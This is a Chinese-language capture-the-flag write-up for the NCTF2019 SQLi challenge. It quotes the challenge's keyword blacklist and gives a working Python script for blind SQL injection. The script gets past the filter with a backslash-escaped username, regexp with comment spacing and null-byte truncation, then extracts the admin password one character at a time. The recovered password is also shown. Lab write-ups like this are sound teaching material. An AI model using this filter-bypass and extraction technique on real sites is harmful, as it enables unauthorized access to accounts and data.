[NCTF2019]SQLi

[NCTF2019]SQLi

使用dirsearch扫面一下，发现了robots.txt

然后直接url进入查看robots.txt内容

发现有hint.txt仍然还是进入查看hint.txt内容

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

这里黑名单里的内容很多，过滤了很多东西，并且If $_POST['passwd'] === admin's password要求要满足密码为admin的密码才会得到flag

使用python脚本爆破密码：

import requests
from urllib import parse
import string
import time
 
url='http://76cd948a-a7f3-4ab1-a28d-d7bc2bc26050.node4.buuoj.cn:81/index.php'
 
string= string.ascii_lowercase + string.digits + '_'
 
flag=''
 
for i in range(100):
    for j in string:
 
        data={
            "passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((flag+j),parse.unquote('%00')),
            #'passwd':'||/*1*/passwd/*1*/regexp/*1*/"^{}";{}'.format(i,'%00'),
            'username':"\\"
        }
        #print(data)
        res = requests.post(url=url,data=data).text
        #print(res)
        if 'welcome' in res:
            flag+=j
            print(flag)
            #print(res)
            break
        time.sleep(0.1)
    time.sleep(0.1)

运行得到密码

 you_will_never_know7788990

用户名任意（只要不是admin）密码如上